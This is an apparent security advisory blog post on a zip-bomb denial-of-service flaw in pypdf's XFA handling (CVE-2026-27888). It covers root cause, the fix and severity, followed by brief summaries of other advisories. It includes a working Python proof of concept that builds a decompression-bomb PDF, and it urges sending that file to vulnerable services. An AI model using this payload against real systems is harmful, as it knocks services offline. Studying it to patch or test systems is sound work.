Feb 26, 2026·5 min read·46 visits
pypdf versions prior to 6.7.3 are vulnerable to a Denial of Service attack via the `xfa` property. An attacker can craft a tiny PDF with a highly compressed stream that expands to gigabytes in memory, crashing the Python process.
A critical resource exhaustion vulnerability in the popular pypdf library allows attackers to crash applications by supplying a malicious PDF. The flaw lies in the handling of XML Forms Architecture (XFA) streams, where a 'zip bomb' technique can trigger unbounded memory allocation.
If you've been in security for more than five minutes, you know that parsing untrusted file formats is the digital equivalent of licking a subway pole. PDFs are particularly egregious offenders. They aren't just documents; they are containers for images, fonts, JavaScript, and—thanks to Adobe's enterprise legacy—XML Forms Architecture (XFA).
pypdf is the go-to pure-Python library for handling these monstrosities. It's used everywhere: from RAG (Retrieval-Augmented Generation) pipelines extracting text for LLMs, to automated invoice processing systems in fintech. It's convenient, easy to install, and usually robust.
But here's the catch: convenience often comes at the cost of safety. In CVE-2026-27888, we find a classic 'zip bomb' vulnerability hiding inside the complex structure of XFA data. An attacker can send you a PDF that looks innocent—maybe 10KB on disk—but when your Python script tries to read its metadata, it suddenly demands 10GB of RAM. The OS panics, the OOM killer wakes up, and your service goes dark. It’s a beautifully simple Denial of Service.
The root cause here isn't some complex heap grooming or race condition. It's a failure of imagination regarding input validation. The vulnerability lives in pypdf/_doc_common.py, specifically in how the library fetches XFA data.
PDFs store XFA forms as streams. To save space, these streams are compressed, usually with FlateDecode (zlib). When you access reader.xfa or writer.xfa, pypdf needs to decompress that stream to give you the XML content.
Here is the logic flaw: The developers assumed that if a stream existed, it should be decompressed in its entirety into a single Python bytes object. There were no guardrails. No checks to ask, "Hey, should this 5KB compressed blob really turn into a 4GB string?"
> [!NOTE] > In the world of data compression, high ratios are easy to achieve if the data is repetitive. A stream of a billion 'A's compresses down to almost nothing. If you blindly decompress it, you are handing the attacker a lever to exhaust your server's memory.
Let's look at the code. This is a perfect example of "it works until it doesn't." In versions prior to 6.7.3, the code looked something like this:
# pypdf/_doc_common.py (Vulnerable)
if isinstance(f, IndirectObject):
field = cast(Optional[EncodedStreamObject], f.get_object())
if field:
# The fatal line:
es = zlib.decompress(field._data)
retval[tag] = esSee that zlib.decompress(field._data)? That is a loaded gun pointed at your RAM. zlib will happily keep allocating memory until the decompression is finished or your kernel kills the process. It doesn't care that you're running on a t3.micro instance.
Now, look at the fix introduced in commit 7a4c8246ed. The maintainers introduced a wrapper that knows when to say "stop."
# pypdf/_doc_common.py (Fixed)
from .filters import _decompress_with_limit # <--- The Savior
if field:
# Safe decompression:
es = _decompress_with_limit(field._data)
retval[tag] = esThe _decompress_with_limit function uses zlib.decompressobj to decompress in chunks, tracking the total size and raising a LimitReachedError if it exceeds a predefined threshold (defaulting to a sane limit like 2GB or less, configurable via ZLIB_MAX_OUTPUT_LENGTH).
Exploiting this is trivial and requires no special tools—just a few lines of Python. We are going to build a valid PDF structure that contains a malicious XFA stream.
Here is the recipe for disaster:
zlib with the highest compression level (9)./XFA array of the PDF's /AcroForm dictionary.# The "I hate your RAM" PoC
from pypdf import PdfWriter
from pypdf.generic import NameObject, DictionaryObject, EncodedStreamObject, ArrayObject
import zlib
# 1. Generate 1GB of 'A's (this consumes RAM on the attacker machine temporarily)
# In a real weaponized script, we'd stream this into the zlib compressor.
payload = b'A' * (1024 * 1024 * 1024)
# 2. Compress it. This will shrink to a few KB.
compressed_data = zlib.compress(payload, level=9)
# 3. Build the PDF structure
writer = PdfWriter()
writer.add_blank_page(width=72, height=72)
# Create the stream object
stream = EncodedStreamObject()
stream._data = compressed_data
stream[NameObject("/Filter")] = NameObject("/FlateDecode")
# Attach it to the XFA dictionary
xfa_array = ArrayObject([stream])
acro_form = DictionaryObject()
acro_form[NameObject("/XFA")] = writer._add_object(xfa_array)
writer.root_object[NameObject("/AcroForm")] = writer._add_object(acro_form)
# 4. Save the bomb
with open("memory_nuke.pdf", "wb") as f:
writer.write(f)Now, send memory_nuke.pdf to any service that uses a vulnerable pypdf to inspect metadata. As soon as they access the xfa property... BOOM. The process hangs, memory usage spikes vertically, and the service dies.
Why is this a big deal? Because we automate everything. Modern document processing pipelines often accept uploads from the public internet (resumes, invoices, legal forms). These pipelines often run in memory-constrained environments like AWS Lambda or Kubernetes pods.
If your application uses pypdf to check for form fields (reader.get_form_text_fields() often interacts with XFA components internally) or simply tries to extract all metadata for indexing, a single malicious user can take down your worker nodes.
This isn't just a crash; in a shared hosting environment or a poorly isolated container, this memory pressure can affect other neighbors or lock up the host system entirely. It's a low-effort, high-impact asymmetric attack.
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U| Product | Affected Versions | Fixed Version |
|---|---|---|
pypdf py-pdf | < 6.7.3 | 6.7.3 |
| Attribute | Detail |
|---|---|
| CWE ID | CWE-400 (Uncontrolled Resource Consumption) |
| CVSS v4.0 | 6.6 (Medium) |
| Attack Vector | Network / Local |
| Exploit Status | PoC Available |
| Impact | Denial of Service (DoS) |
| Affected Component | pypdf.PdfReader.xfa |
A vulnerability in the Slack and Mattermost platform adapters for NousResearch hermes-agent permits an unauthenticated remote attacker to execute arbitrary mass mentions. By leveraging prompt injection, an attacker can bypass output sanitization logic and trigger workspace-wide notification exhaustion.
CVE-2026-9306 is a critical unauthenticated Insecure Direct Object Reference (IDOR) vulnerability located in the QuantumNous new-api application, affecting versions up to and including 0.12.1. The flaw is caused by improper middleware ordering combined with a lack of object-level authorization checks. This allows remote, unauthenticated attackers to retrieve sensitive Midjourney images belonging to other users by supplying a valid task identifier.
The instagrapi library prior to version 2.6.9 contains an improper input validation vulnerability within its challenge handling mechanism. Maliciously crafted server responses can manipulate the client into forwarding session cookies and credentials to an external attacker-controlled domain.
GHSA-QQQM-5547-774X is a critical path traversal vulnerability in the FileBrowser Quantum application, specifically within the Go backend package. The vulnerability resides in the HTTP handler responsible for processing bulk file modifications via the public API. Unauthenticated attackers can exploit an order-of-operations flaw in the path sanitization logic to bypass intended directory restrictions. This allows adversaries to arbitrarily read, move, and overwrite files on the underlying filesystem by supplying specially crafted HTTP PATCH requests.
The qs query string parsing and serialization library for Node.js is vulnerable to a synchronous Denial of Service (DoS) attack. The vulnerability manifests as a process-terminating TypeError when processing arrays with null or undefined elements under specific configuration parameters.
The aiosend library prior to version 3.0.6 contains a pre-authentication Denial of Service (DoS) vulnerability in its webhook handling mechanism. The software processes and deserializes incoming JSON payloads before verifying the cryptographic signature, allowing unauthenticated attackers to exhaust server CPU and memory resources by sending large, complex payloads.